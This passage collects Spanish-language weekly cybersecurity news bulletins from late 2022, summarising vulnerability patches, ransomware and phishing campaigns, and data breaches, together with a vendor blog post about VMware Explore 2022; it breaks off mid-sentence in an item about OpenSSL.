Boletín semanal de Ciberseguridad, 10 – 16 de diciembre
Microsoft corrige en su Patch Tuesday de diciembre dos vulnerabilidades 0-day y otros 49 fallos Entre las vulnerabilidades corregidas, dos de ellas son 0-day, uno de ellos activamente explotado e identificado como CVE-2022-44698 y CVSS 5.4, que hace referencia a una vulnerabilidad de omisión de la característica de seguridad de Windows SmartScreen. Un atacante podría explotar esta vulnerabilidad creando un archivo malicioso que evada la seguridad de Mark Of The Web (MOTW), lo que resultaría en la pérdida de funciones de seguridad como el de la vista protegida en Microsoft Office. Los actores amenaza explotaron esta vulnerabilidad a través de archivos JavaScript maliciosos en numerosas campañas de distribución de malware. El otro 0-day, identificado como CVE-2022-44710 y CVSS 7.8, permitiría la escalada de privilegios del kernel de gráficos DirectX. El resto de los fallos corregidos permitirían la divulgación de información, denegación de servicio y suplantación de identidad. Finalmente, Microsoft ha incluido en su actualización, 29 mejoras y correcciones entre las que solucionan problemas en el Administrador de tareas, Microsoft OneDrive o Windows Spotlight. Más info → * * * Citrix corrige una vulnerabilidad 0-day activamente explotada Citrix ha emitido una alerta de seguridad avisando a los administradores de una vulnerabilidad 0-day crítica en Citrix ADC y Gateway que estaría siendo activamente explotada. Esta vulnerabilidad, identificada como CVE-2022-27518 y aún pendiente de puntuación CVSS, permitiría a un atacante ejecutar código de manera remota sin necesidad de autenticarse. Las versiones afectadas de Citrix ADC y Citrix Gateway serían las anteriores a la 13.0-58.32 y se corregiría actualizando a la versión actual 13.0-88.16 o 13.1. Si bien la compañía no ha ofrecido detalles al respecto, en su nota de seguridad hace referencia a un pequeño número de ataques dirigidos aprovechando esta vulnerabilidad. La Agencia Nacional de Seguridad de Estados Unidos ha emitido por su parte un advisory indicando que se trataría de ataques atribuidos al grupo conocido como APT5, UNC2630 o MANGANESE e incluye técnicas de detección y mitigación de estos. Más info ⇾ * * * Solucionado un nuevo 0-day de Apple que estaba siendo explotado activamente Apple ha publicado su boletín de seguridad mensual en el que corrige una amplia gama de vulnerabilidades que afectan a iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2 y macOS Ventura 13.1, y entre las que destaca el décimo 0-day del año que afecta a dispositivos iPhone, el cual podría estar siendo activamente explotado. En concreto, este fallo de seguridad identificado como CVE-2022-42856 se trata de un problema en el motor de navegación del Webkit de Apple, lo que podría permitir a actores amenaza crear un sitio web malicioso especialmente diseñado para poder realizar una ejecución de código arbitrario en un dispositivo vulnerable. Cabe indicar que dicha vulnerabilidad fue descubierta por el investigador de seguridad Clément Lecigne, perteneciente al equipo de análisis de amenazas de Google, y si bien por el momento no se dispone de más detalles sobre esta cuestión, se estima que pasado un tiempo prudencial desde la publicación de los parches sea publicada más información sobre esta vulnerabilidad una vez que los usuarios actualicen sus dispositivos. Más info ⇾ * * * Ransomware Royal pasa a ser una amenaza potencial Investigadores de Cybereason Global SOC y Cybereason Security Research Teams han publicado un análisis acerca del grupo de ransomware Royal, donde describen sus tácticas, técnicas y procedimientos (TTP). Detectado a comienzos del presente año, no fue hasta el mes de septiembre cuando comenzó a utilizar su propioransomware, generando que se haya convertido en el ransomware más activo actualmente, llegando a superar a Lockbit. Los vectores de entrada de Royal son diversos, siendo uno de ellos mediante campañas de phishing, utilizando asimismo loaders como Qbot o BATLOADER, que posteriormente implementan un payload de Cobalt Strike con el fin de continuar la operación de infección. Además, se sabe que el ransomware emplea múltiples subprocesos para acelerar el cifrado, y que utiliza cifrado parcial, haciendo que su detección sea más difícil. Los investigadores estiman que Royal estaría formado por ex miembros de otros grupos de ransomware, señalando específicamente a Conti. Asimismo, desde Cybereason indican que el ransomware Royal es una amenaza altamente potencial, debido a que sus víctimas no son de un sector específico y se reparten a lo largo de todo el mundo. Más info ⇾ * * * Las cookies de Atlassian permiten el acceso no autorizado incluso con el doble factor activado Recientemente la compañía de seguridad CloudSek fue víctima de un ciberataque y en la investigación interna que ha desarrollado ha descubierto la existencia de una vulnerabilidad en los productos de Atlassian. CloudSek identificó que el actor amenaza accedió a la cuenta de Jira de un empleado suyo mediante el uso de una cookie de sesión sustraída con un stealer y vendida en la darkweb, lo que propició que la investigación revelara que las cookies de los productos de Atlassian (Jira, Confluence, Trello y BitBicket) siguen siendo válidas durante 30 días incluso aunque se haya cambiado la contraseña del usuario o el doble factor de autenticación esté activado. Atlassian aún no ha parcheado la vulnerabilidad, por lo que Cloudsek advierte del amplio impacto que podría tener dado que afecta a más de 10 millones de usuarios de las 180.000 empresas que han contratado productos de Atlassian. Más info ⇾
16 de diciembre de 2022
Boletín semanal de Ciberseguridad, 3 – 9 de diciembre
Noveno 0-day del año en Chrome Google ha lanzado Chrome 108.0.5359.94 para Mac y Linux, y 108.0.5359.94/.95 para Windows, donde se corrige una vulnerabilidad 0-day, siendo esta la novena detectada en el año en Chrome. Catalogada como CVE-2022-4262 con una criticidad alta de acuerdo con Google, es descrita como Type confusión en V8 en Google Chrome, para las versiones anteriores a la 108.0.5359.94. La explotación de este fallo de seguridad podría permitir a un atacante remoto explotar potencialmente la corrupción de la pila a través de una página HTML manipulada. Desde Google no han ofrecido más detalles de este fallo detectado por Clement Lecigne de Threat Analysis Group de Google el pasado 29 de noviembre, hasta que la mayoría de los usuarios tengan actualizado el navegador. Cabe destacar que en el aviso de seguridad publicado por la compañía se informa acerca de que existe actualmente un exploit para esta vulnerabilidad. Más info → * * * Vulnerabilidad RCE en el código de Visual Studio El investigador de seguridad de Google, Thomas Shadwell, ha identificado una importante vulnerabilidad en Visual Studio Code. En concreto, este fallo de seguridad identificado como CVE-2022-41034, con un CVSSv3 de 7.8, podría permitir a actores maliciosos realizar una ejecución remota de código, posibilitando la toma del control del equipo de la víctima. La metodología empleada para realizar el ataque consiste en la remisión de un enlace a un sitio web con el fin de apoderarse del equipo de un usuario de Visual Studio Code y cualquier otro dispositivo conectado a través de la función de desarrollo remoto de Visual Studio Code. Según el investigador, este problema afecta a GitHub Codespaces, github.dev y Visual Studio Code versión web y escritorio. Cabe indicar que esta vulnerabilidad de ejecución remota de código afecta a VS Code 1.71 y versiones anteriores. Asimismo, se recomienda aplicar el parche lanzado por Microsoft para corregir este fallo de seguridad. Más info → * * * Vulnerabilidad en routers de Netgear parcheada de forma urgente En el contexto de Pwn20wn Toronto 2022, una competición de bug hunting que se lleva celebrando como parte de la conferencia de seguridad CanSecWest desde 2007, el fabricante de los dispositivos Netgear se ha visto obligado a parchear una vulnerabilidad de forma urgente. En este sentido, investigadores de Tenable han publicado un artículo en el que a partir del código publicado por Netgear para mitigar la vulnerabilidad en dispositivos Netgear Nighthawk WiFi6 Router (RAX30 AX2400 series) revelan detalles del fallo corregido, en concreto un error de configuración a nivel de red por el que no se estarían aplicando correctamente las políticas de restricción de acceso a los dispositivos cuando estos tenían una interfaz IPv6 expuesta. La vulnerabilidad, que por el momento no tiene todavía CVE asignado, se mitigaría con la actualización propuesta por el fabricante a las versiones 1.0.9.90 y posteriores. Siguiendo las indicaciones de Tenable, se recomienda realizar la comprobación manual dado que los dispositivos con versiones superior a v1.0.6.74 no estarían siendo capaces de autoactualizarse automáticamente. Más info → * * * Vulnerabilidad de alta gravedad en dispositivos telefónicos IP de Cisco Cisco ha publicado un aviso de seguridad en el que alerta sobre una vulnerabilidad de alta criticidad que afecta a varios modelos de sus dispositivos de teléfonos IP de su marca. En concreto, este fallo de seguridad catalogado como CVE-2022-20968, y con un CVSSv3 según fabricante de 8.1, podría permitir a un actor malicioso provocar un desbordamiento de pila, desencadenando una ejecución remota de código o un ataque de denegación de servicio (DoS). Si bien desde el equipo de respuesta a incidentes de seguridad de la compañía es consciente de la existencia de una prueba de concepto, no disponen de evidencias de que esta haya sido explotada en ataques. Cabe señalar que Cisco ha indicado que lanzará un parche de seguridad el próximo mes de enero de 2023, y que hasta entonces recomienda una serie de consejos de mitigación mediante la deshabilitación del protocolo de descubrimiento de Cisco en los dispositivos afectados, los cuales son IP Phone 7800 y 8800 Series que ejecutan la versión de firmware 14.2 y anteriores. Más info → * * * Zombinder: servicio de reempaquetado de apps con malware Investigadores de ThreatFrabric han publicado un artículo en el que detallan la existencia de un servicio en la dark web, al que han llamado Zombinder, que permite a actores de amenaza agregar malware a aplicaciones legítimas con el objetivo de evadir de esta manera controles de seguridad. Los investigadores destacan que las aplicaciones reempaquetadas con Zombinder cumplen al 100% con su cometido original, por lo que la víctima no sospecha que ha sido infectada con un software malicioso, generalmente de tipo stealer. Desde ThreatFrabric señalan que han identificado principalmente el clipper denominado “Laplas” y conocidos stealers de información como “Ermac”, “Erbium” y “Aurora” en aplicaciones modificadas por Zombinder. En último lugar, cabe destacar que este servicio está dirigido contra usuarios de aplicaciones de sistemas operativos Windows y Android. Más info →
9 de diciembre de 2022
VMware Explore '22 capitaliza la interoperabilidad entre múltiples nubes y entornos Cross-Cloud
Escrito por Matheus Bottan Partner development en Telefónica Tech Antes conocido como VM World (marca que dio sus primeros pasos en 2004) no hace falta decir que el actual VMware Explore es un gran referente en la evolución de la industria del software y forma parte de “los eventos imprescindibles” para el mercado IT y para todo aquel interesado en infraestructuras de aplicaciones modernas. Durante el último VMware Explore (edición de Europa), celebrado en noviembre en Barcelona, los asistentes tuvimos ocasión de participar en una gran cantidad de actividades: desde sesiones con los ejecutivos de VMware y con expertos de partners hasta demostraciones prácticas y hackatons con la nube y con expertos en seguridad de Tanzu, Vsphere+ y NSX. Mi experiencia en VMware Explore 2022 Por razones profesionales me centré en las sesiones con socios. Asistí a diversas sesiones técnicas y también, por diversión, me pasé un rato por la pista más grande del evento para experimentar el simulador McLaren Racing F1 (donde hice tres vueltas desastrosas). Matheus Bottan en VMware Explore Europe 2022 Personalmente, lo que me llevo del evento es la certeza de que la adopción de entornos cross-multicloud es imparable, ya que los administradores seguirán ejecutando sus tareas en la nube que mejor se ajuste a cada aplicación. Es decir, ejecutará Inteligencia Artificial en GoogleCP; herramientas de workplace, en Azure; casos críticos, en AWS, etc. y de igual manera mantener información sensible, confidencial y de última generación en alguna nube privada (por ejemplo, Dell, HP, Oracle, Alibaba, etc.) Por no hablar de los futuros proyectos de nube soberana. Nuevas tendencias tecnológicas Dicho esto, no podemos dejar de mencionar los K8. El lema del evento fue "cualquier app, cualquier cloud, cualquier K8". Para aquellos que no estén familiarizados con el acrónimo, estoy seguro de que lo conocen por su nombre "científico": Kubernetes. Google liberó el código del proyecto Kubernetes en 2014. El 'lounge' de Telefónica Tech en VMware Explore 2022 Similar a lo que hizo VMware hace una década con las máquinas virtuales, K8 es ya la nueva realidad para crear aplicaciones complejas y está contribuyendo a allanar el camino. No solo hacia el entorno de trabajo del futuro, sino también hacia sectores completamente nuevos como los de biotecnología, hiperconectividad y Ciberseguridad, turismo espacial o computación cuántica, por nombrar algunos. La plataforma de VMware Tanzu está lista para abordar y orquestar los entornos de múltiples nubes necesarios para este tipo de implementaciones de vanguardia. La próxima oleada de tendencias tecnológicas será muy pronto una realidad y K8 sin duda forma parte de esa evolución, ya que las aplicaciones en contenedores impulsan la Ciberseguridad y la evolución de IoT y de OT (tecnología operativa) y por tanto surgen nuevos tipos de tráfico de red, nuevos métodos de implementación de software, y K8 también evolucionará siguiendo sus propios ciclos —y parece estar preparado para el futuro, ya que permite la portabilidad de las tareas y está siendo adoptada por todos los fabricantes. Desarrollaré algunas de las tendencias futuras más relevantes y especulemos un poco en torno a ellas, como en un ejercicio de coincidencia con los temas de las sesiones técnicas de VMware Explore Europe 2022: Arquitecturas de confianza en Ciberseguridad: aparecerán nuevos tipos de delitos cibernéticos en las próximas décadas debido a la evolución de las máquinas y el software: al ser una tendencia tecnológica en crecimiento, las arquitecturas Zero trust (de confianza cero) ayudarán en la lucha contra el futuro delito cibernético. El futuro de la hiperconectividad: IoT estará virtualmente en todos los dispositivos para 2050, lo que significa que se necesitará superpotencia informática e hiperconectividad que proporcionan las tecnologías de comunicaciones láser y los satélites interconectados. Potencia de cómputo de próxima generación: cambiar de CPU a GPU (incluso descargar con DPU) será un tema antiguo para 2040, ya que la computación cuántica real nos ayudará a encontrar respuestas a problemas que han obstaculizado a la ciencia y a la sociedad durante siglos. Codificación 2.0: personalmente es mi favorito si miro hacia atrás, a los primeros días de mi carrera: de 2030 en adelante comenzaremos a ver las nuevas plataformas de codificación donde la Inteligencia Artificial escribe el código y el programador sólo tiene que vigilar las discrepancias. ¡Bienvenido al software 2.0! o como quieras llamar al puesto de trabajo del programador del futuro. Verdadera integración de Inteligencia Artificial y robótica: Imagínate nanorobots autorreplicantes que pueden hacer el trabajo sucio en distintas circunstancias: desde emergencias médicas hasta la exploración espacial, desde la agricultura de precisión hasta el rescate de personas. Tecnología limpia: por supuesto, la energía siempre será una preocupación para el nuevo mundo que se avecina y aquí Kubernetes es protagonista y uno de los primeros en adoptar conceptos como tecnología limpia que, gracias a supereficiencia energética, ayudará a las empresas a cumplir con sus objetivos ESG y de emisiones cero. Cómo Telefónica Tech apuesta por las tecnologías de VMware y promueve proyectos de innovación colaborativa Emilio Moreno, product manager de Telefónica Tech, durante nuestra presentación en VMware Explore Europe 2022 En Telefónica Tech tenemos una enorme cartera de clientes distintos en el mundo multicloud y somos líderes en la transformación digital de nuestros clientes B2B, reconocido por los analistas de la industria. Nuestra asociación con VMware es clave. No solo para nuestros proyectos con los usuarios finales, sino también en proyectos internos en los que las tecnologías de VMware nos permiten construir los mejores Servicios Gestionados que podríamos ofrecer. Igual que venimos haciendo desde hace muchos años, cuando Telefónica adoptó por primera vez las soluciones de VMware en nuestro core de VDC y nodos de edge computing. Os invito a seguirnos para recibir más información sobre las nuevas hojas de ruta de productos y proyectos de innovación colaborativa en Telefónica Tech y VMware. Si eres cliente, contacta con nosotros para recibir más información sobre nuestros SKU para la gestión de múltiples nubes que hacen uso de la tecnología de VMware. ¡Nos vemos en el próximo VMware Explore '23!
5 de diciembre de 2022
Boletín semanal de Ciberseguridad, 26 de noviembre – 2 de diciembre
Actualización urgente de Chrome para evitar el octavo 0-day del 2022 Google ha publicado una actualización de seguridad urgente para Chrome para evitar la explotación del octavo 0-day del 2022 en el navegador. Con esta publicación se parchea la vulnerabilidad CVE-2022-4135, un problema de desbordamiento de pila. Este tipo de vulnerabilidadespermitían a un atacante la ejecución arbitraria de código. Google tuvo conocimiento de que la vulnerabilidad estaba siendo activamente explotada por agentes maliciosos, por lo que ha lanzado el parche apenas unos días después del descubrimiento de esta por parte de su equipo Threat Analysis Group. La compañía no ha querido aportar detalles del problema hasta que los usuarios hayan tenido tiempo de aplicar el parche para evitar la propagación de su explotación. Se recomienda a los usuarios de Chrome que actualicen a la versión 107.0.5304.121/122 para Windows y 107.0.5304.122 para Mac y Linux, que soluciona la CVE-2022-4135. Más información → * * * Expuestos los datos de 5,4 millones de usuarios de Twitter El investigador de seguridad Chad Loder publicó en Twitter que en un foro de la dark web se estaba compartiendo de manera gratuita una base de datos que contenía 5,4 millones de entradas y que recopilaba información tanto pública (nombres de usuario, identificadodes, seguidores, localización, biografía, etc) como confidencial (números de teléfono y dirección de correo electrónico) de usuarios de la propia red social. Después de la publicación, Twitter suspendió la cuenta de Loder, por lo que esté compartió la información a través de Mastodon. Según Loder, esta base de datos es la misma que se puso a la venta en julio y se obtuvo explotando una vulnerabilidad (ahora parcheada) en la API de Twitter que permitía a un atacante conocer la cuenta asociada a números de teléfono o direcciones de correo electrónico. Cuando salió a la luz la venta de la base de datos, Twitter reconoció la autenticidad de esta. Más información → * * * Desarticulada en España una red de phishing que defraudó 12 millones de euros La Policía Nacional de España ha emitido un comunicado en el que informa del éxito de una operación que ha concluido con la desarticulación de un grupo criminal que había estafado mediante phishing más de 12 millones de euros a un total de casi 300 víctimas. Los seis detenidos en Madrid y Barcelona han sido acusados de presunta pertenencia a organización criminal, estafa, blanqueo de capitales y usurpación de estado civil. Según el comunicado policial, la investigación comenzó con la denuncia de una entidad bancaria española por un caso de phishing en el que estaba siendo suplantada por los criminales, que ofrecían mediante estas webs falsas operaciones financieras de renta variable, criptomonedas y contratación de productos financieros a clientes franceses. La policía no ha hecho públicas las URLs maliciosas usadas por la organización criminal. Más información → * * * Tres vulnerabilidades en los productos industriales de Festo y Codesys Investigadores de Forescout han descubierto tres vulnerabilidades en productos de automatización industrial de las compañías Festo y Codesys. La más crítica de las tres es la vulnerabilidad CVE-2022-3270 (a falta de su publicación en NIST Forescout le ha otorgado preventivamente una puntuación de CVSS 9.8), radicada en los PLCs de Festo y que permitiría a un atacante sin autenticación tomar el control del dispositivo o lograr una denegación de servicio (DoS). Por su parte, la vulnerabilidad CVE-2022-4048 (que Forescout ha puntuado con un CVSS 7.7) afecta a los productos Codesys V3 y consiste en un problema de escasa codificación que permitiría a un atacante la manipulación lógica del producto. Por último, la vulnerabilidad CVE-2022-3079, con un CVSS 7.5, permite a un atacante sin autenticación acceder remotamente a funciones críticas de la página web del producto y podría permitir lograr una denegación de servicio. Por el momento, no se han publicado parches para estas vulnerabilidades. Más información → * * * Investigación de Google acerca del framework Heliconia Threat Analysis Group (TAG) de Google ha publicado los resultados de una investigación acerca de un exploitation framework dirigido contra vulnerabilidades ya parcheadas en Chrome, Firefox y Microsoft Defender que podrían implementar un payload en los dispositivos afectados, concretamente un spyware. El equipo de Google tuvo conocimiento de este framework gracias a un envío anónimo al programa de informes de errores de Chrome. Dicho envío contenía tres errores, con instrucciones y un archivo con el código fuente: "Heliconia Noise" permite implementar un exploit para un error en el renderizador de Chrome seguido de un sandbox escape. "Heliconia Soft" implementa un PDF que contiene un exploit de Windows Defender. "Heliconia Files" contiene un conjunto de exploits de Firefox para Windows y Linux. Desde Google señalan que, aunque no se ha detectado su explotación activa, lo más probable es que las vulnerabilidades fueran explotadas como 0-days antes de su corrección en 2021 y principios de 2022. Cabe señalar asimismo que desde Google han podido rastrear el origen de este exploitation framework Heliconia gracias al análisis del código fuente, pudiendo vincular su desarrollo a la empresa con sede en Barcelona Variston IT, proveedor de soluciones de seguridad, de acuerdo con la información de su página web. Más información →
2 de diciembre de 2022
Boletín semanal de Ciberseguridad, 11 – 18 de noviembre
Actualizaciones de seguridad para 35 vulnerabilidades de Cisco Cisco ha publicado una actualización de seguridad con la que solventa 35 vulnerabilidades en Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD) y Firepower Management Center (FMC). Ocho de las 35 vulnerabilidades tienen criticidad alta, siendo las más elevadas las vulnerabilidades CVE-2022-20946 y CVE-2022-20947 (con una puntuación CVSS de 8.6 en ambos casos), que afectan a los productos Cisco ASA y Cisco FTD. Un atacante no autenticado podría explotarlas para conseguir una condición de denegación de servicio (DoS). También destaca la vulnerabilidad CVE-2022-20927 (CVSS de 7.7), que afecta a los mismos productos que las anteriores y también conduciría a un atacante a causar una condición DoS. Del resto de errores sobresalen 15 vulnerabilidades cross-site scripting (XSS) en la interfaz de Cisco FMC. Según el boletín de Cisco, no se conocen exploits activos contra ninguna de las vulnerabilidades recién parcheadas. Más info → * * * Campaña a gran escala de Fangxiao suplantando a cientos de empresas El equipo de Cyjax ha publicado una investigación acerca de una sofisticada campaña a gran escala en la que los actores maliciosos habrían creado y utilizado más de 42.000 dominios web. De acuerdo con los investigadores, detrás de esta campaña se encontraría el grupo Fangxiao, cuyo modus operandi consistiría en el envío de enlaces por WhatsApp que redirigen al usuario a un dominio controlado por los atacantes, y donde se suplanta a empresas conocidas. Cabe señalar que hasta la fecha se habrían detectado más de 400 empresas suplantadas del sector de la banca, retail, energía, viajes, etc. Tras completar una encuesta inicial bajo el pretexto de obtener premios, los usuarios son redirigidos nuevamente a otros dominios que cambian constantemente, finalizando en la descarga de una aplicación con el troyano Triada. En otros casos, el esquema fraudulento deriva a los usuarios a la página web de Amazon mediante un enlace de afiliado que repercute en una comisión a quien controle la redirección final. Asimismo, también se han detectado casos donde se deriva al usuario a una estafa de micropagos por SMS. Desde Cyjax indican que la campaña estaría dirigida a usuarios de todo el mundo. Más info → * * * Mozilla corrige múltiples vulnerabilidades Mozilla ha anunciado el lanzamiento de la nueva versión del navegador Firefox 107 en la cual se corrigen numerosas vulnerabilidades. Con esta nueva versión se han solucionado 19 vulnerabilidades en total, dentro de las cuales Mozilla ha categorizado nueve como de impacto alto. Entre estas, la mayoría se debe a errores relacionados con la mala gestión de la memoria que podrían producir un bloqueo del programa, entre otros errores que conducirían a la divulgación de información u omisión de notificaciones para llevar a cabo ataques de suplantación de identidad. Un ejemplo de esto es la vulnerabilidad identificada como CVE-2022-45407, mediante la cual un atacante podría cargar un archivo fuente (font file) legítimo y desencadenar un bloqueo, fallo denominado por Mozilla como “bloqueo potencialmente explotable”. Otra de las vulnerabilidades corregidas, identificada como CVE-2022-45404, se describe como “omisión de notificación de pantalla completa”. Cabe destacar que estos fallos también han sido corregidos en Mozilla Thunderbird con la versión 102.5. Más info → * * * Nuevos detalles de la última campaña de Emotet Después de la detección de nuevas infecciones con Emotet a comienzos del mes de noviembre, numerosos investigadores han analizado pormenorizadamente la última campaña llevada a cabo entre los días 2 y 11 de noviembre. Tal y como ya informaron inicialmente investigadores de Cryptolaemus, en esta campaña distribuida por email uno de los cambios más notables con respecto a anteriores campañas es que los actores maliciosos (TA542) indican a las víctimas que copien el archivo Excel adjunto malicioso en la carpeta Templetes, donde la protección de macros no está activada. Asimismo, también se han detectado novedades en el binario de Emotet, así como la vuelta a la funcionalidad de entrega de otras familias de malware, habiéndose detectado su uso para difundir nuevas variantes de IcedID loader o de Bumblebee. De acuerdo con la investigación publicada por Proofpoint, en esta campaña se habrían intentado entregar cada día cientos de miles de correos electrónicos con diferentes señuelos y escritos en varios idiomas, lo que ha situado a las víctimas en España, México, Grecia, Brasil, Estados Unidos, Reino Unido, Japón, Alemania, Italia, o Francia, entre otros. Asimismo, se estima que, aunque desde el día 11 no se haya vuelto a detectar actividad, es muy probable que TA542 vuelva a distribuir Emotet pronto al encontrarse de nuevo su red plenamente operativa. Más info → * * * Qbot cambia para abusar del panel de control de Windows 10 El investigador de seguridad conocido en Twitter como “proxylife” (@pr0xylife) ha descubierto la existencia de una campaña de phishing con el malware Qbot, también conocido como Qakbot, en la que se ha observado que ha pasado de explotar una vulnerabilidad en la calculadora de Windows 7 a aprovecharse de un error en el ejecutable ‘control.exe’ del panel de control de Windows 10. En concreto, Qbot crea un archivo malicioso DLL con el mismo nombre y en la misma carpeta que la DLL legítima, haciendo que Windows lo ejecute y descargue en el equipo de la víctima el troyano. De esta manera, además, consigue evadir la protección de los software antivirus, ya que no marcarán como malicioso un programa que se haya instalado desde el panel de control de Windows 10. Una vez instalado en el equipo objetivo, Qbot robará emails para usarlos en campañas de phishing o, incluso, puede usarse para descargar otros tipos de malware como Brute Ratel o Cobalt Strike. Más info →
18 de noviembre de 2022
Boletín semanal de Ciberseguridad, 5 - 11 de noviembre
Reactivación de la plataforma de phishing Robin Banks Investigadores de IronNet han publicado la segunda parte de su investigación sobre la plataforma de Phishing-as-a-Service Robin Banks. Esta plataforma fue descubierta en junio de este año tras la detección de una campaña masiva de phishing contra instituciones financieras de EE.UU., tras lo cual fue bloqueada por Cloudflare y sus operaciones quedaron interrumpidas. Ahora la plataforma habría vuelto a la actividad a través del ISP ruso DDoS-Guard, incorporando nuevas funciones como múltiple factor de autenticación y redirectoras Adspect, que ayudarían a evitar su detección redirigiendo el tráfico sospechoso a páginas web de aspecto legítimo. Adicionalmente Robin Banks también hace uso de Evilginx2, un proxy que captura cookies de sesión de las víctimas y ayuda a los atacantes a evadir medidas de protección como el doble factor de autenticación. Más info → * * * Incidente de ciberseguridad en un proveedor de Orange Orange ha revelado que uno de sus proveedores habría sufrido un incidente de ciberseguridad que habría derivado en el compromiso de información personal de clientes de la compañía de telecomunicaciones. De acuerdo con el comunicado emitido por la compañía, el incidente en el proveedor se produjo hace varios días y durante el mismo se habría producido un acceso no autorizado a los sistemas. Fruto de este, los datos de un número limitado de clientes, a quienes Orange ya ha avisado vía SMS o correo electrónico, se habrían visto comprometidos. Algunos de los datos expuestos serían el nombre, dirección postal, correo electrónico, teléfono, DNI, fecha de nacimiento, o código IBAN bancario de los clientes, si bien no se habrían expuesto la totalidad de estos datos en los casos afectados. Cabe señalar que entre estos datos no se habrían visto comprometidas contraseñas ni datos de tarjetas de crédito. Desde la compañía procedieron al corte del acceso a los sistemas al ser conocedores del ataque, además de notificarlo a la Agencia Española Protección de Datos y a la Brigada central de Investigación Tecnológica (BCIT) de la Policía Nacional. Más info (PDF) → * * * Microsoft corrige 68 vulnerabilidades incluyendo seis 0-day En su última actualización de seguridad, Microsoft ha corregido un total de 68 vulnerabilidades, siendo 6 de ellas fallos 0-day activamente explotados: CVE-2022-41128, una vulnerabilidad de ejecución remota de código con una puntación CVSS de 8.8. CVE-2022-41091, que permitiría a un atacante evadir las defensas de seguridad de Mark-of-the-Web (MOTW) con una puntuación CVSS de 5.4. CVE-2022-41073 y CVE-2022-41125, que permitirían a un actor malicioso obtener privilegios de sistema y con una puntuación CVSS de 7.8. CVE-2022-41040 y CVE-2022-41082, vulnerabilidades de escalada de privilegios y ejecución remota de código en Microsoft Exchange con una puntuación CVSS de 8.8. Estas dos últimas serían las vulnerabilidades identificadas el pasado mes de septiembre como ProxyNotShell. Otras vulnerabilidades categorizadas por Microsoft como críticas y corregidas en esta última actualización son CVE-2022-37966 y CVE-2022-37967 en Windows Kerberos, CVE-2022-41080 en Microsoft Exchange Server y CVE-2022-38015 en Windows Hyper-V. Más info → * * * Vulnerabilidades críticas en Citrix Gateway y Citrix ADC Como parte de su boletín de seguridad publicado el pasado martes, Citrix ha anunciado tres vulnerabilidades que los usuarios han de parchear de forma urgente y que afectan a su software Citrix Gateway y Citrix ADC. De entre ellas destaca especialmente la CVE-2022-27510 (CVSS 9.8) al ser considerada un fallo crítico que permite eludir el proceso de autenticación usando canales o rutas alternativas cuando la aplicación esté configurada como VPN. Por su parte, las otras dos vulnerabilidades también son consideradas críticas por el NIST, aunque Citrix ha rebajado sus criticidades a alta y media respectivamente. Se trata de los fallos CVE-2022-27513 (CVSS 9.6 según el NIST, 8.3 según fabricante), que permite a los atacantes hacerse con el control del escritorio en remoto vía phishing al no verificar correctamente la autenticidad de los datos cuando el proxy RDP está configurado en el modo VPN; y CVE-2022-27516 (CVSS 9.8 según el NIST, 5.6 según fabricante), vulnerabilidad que permite eludir el mecanismo de protección contra intentos de inicio de sesión mediante fuerza bruta. Esta última es explotable en modo VPN o si está configurado como servidor virtual AAA con un número máximo de intentos de inicio de sesión. La empresa ya ha parcheado estos fallos para los clientes de sus servicios Cloud, pero aquellos usuarios que gestionen directamente estos softwares deberán parchear individualmente. Más info → * * * StrelaStealer: nuevo malware para robar credenciales de correo Investigadores de DCSO CyTec han identificado un nuevo malware, al que han denominado StrelaStealer, que roba credenciales de correo electrónico de Outlook y Thunderbird. La distribución del malware se haría a través de archivos ISO adjuntos a correos electrónicos de diferentes contenidos. En una de las variantes observadas, este adjunto se trataba de un archivo "políglota", es decir, que puede interpretarse como diferentes formatos dependiendo de la aplicación con que se abra. En el caso analizado, este archivo podía actuar descargando StrelaStealer, o bien mostrar un documento señuelo en el navegador por defecto. La campaña se habría observado por primera vez en noviembre de 2022 dirigida a usuarios hispanohablantes. Más info →
14 de noviembre de 2022
Boletín semanal de Ciberseguridad, 21-28 de octubre
Campañas de difusión del malware ERMAC Un equipo de investigadores de Cyble ha descubierto recientemente una campaña de envíos masivos de phishing que buscaría difundir el troyano bancario ERMAC. El método de infección se basaría en la descarga de aplicaciones falsas que suplantan a Google Wallet, PayPal y Snapchat, entre otros, desde dominios falsos con webs que suplantan algunos de los markets de Android más populares. Estas suplantaciones incluyen también dominios falsos basados en las compañías cuyas aplicaciones estarían siendo presuntamente distribuidas. Una vez que estas aplicaciones falsas se ejecutan, el malware ERMAC procede a robar datos como información de contactos y SMS, así como una lista de aplicaciones en uso por parte del dispositivo. A través de esta última función, se despliegan páginas de phishing en la pantalla de la víctima, que a su vez envían los datos recogidos al Command & Control del malware a través de peticiones POST. Más info → * * * Apple corrige vulnerabilidad 0-day para iOS y iPadOS en su último parche En la última actualización lanzada por Apple se corrige, entre otras, una vulnerabilidad 0-day que podría haber sido activamente explotada contra dispositivos iPhone y iPad. Esta vulnerabilidad, identificada como CVE-2022-42827 y aún pendiente de calificación CVSS por parte de Apple, permitiría a un atacante ejecutar código arbitrario en el Kernel con los privilegios más altos. Esto puede llevar a la corrupción de datos, interrupción de funcionamiento o ejecución de código no autorizado en el dispositivo. La actualización que corrige esta vulnerabilidad estaría disponible para modelos de iPhone 8 en adelante, todos los modelos de iPad Pro, iPad Air de tercera generación en adelante y iPad y iPad Mini de quinta generación y posteriores. Más info → * * * VMware corrige una vulnerabilidad crítica en Cloud Foundation VMware ha emitido un advisory sobre dos vulnerabilidades que afectarían a su plataforma híbrida Cloud Foundation, una de ellas crítica. La primera de ellas, identificada como CVE-2021-39144 con una puntuación CVSS de 8.5 (9.8 según VMware), se trata de una vulnerabilidad de ejecución remota de código a través de la librería Xstream. La segunda, identificada como CVE-2022-31678 con una puntuación CVSS de 5.3 asignada por VMware, podría permitir a un atacante provocar una denegación de servicio o exponer información. Ambas vulnerabilidades afectarían a la versión 3.11 de VMware Cloud Foundation (NSX-V) y se corregirían con la última actualización. Más info → * * * Anunciada vulnerabilidad crítica en OpenSSL El equipo de OpenSSL Project ha anunciado que la próxima semana, el día 1 de noviembre, publicará una nueva versión de OpenSSL, la 3.0.7, en la cual se incluirá un parche de seguridad que ha sido catalogado como crítico. Si bien por el momento no se han dado a conocer los detalles de la vulnerabilidad de tal gravedad que se corregirá en esta versión más allá de que no afecta a versiones anteriores a la 3.0, su mera existencia ha causado preocupación al ser la primera vulnerabilidad de carácter crítico que OpenSSL anuncia desde 2016. Pese a que los desarrolladores han anunciado el despliegue de la nueva versión y del fallo con antelación para que los usuarios tengan tiempo de 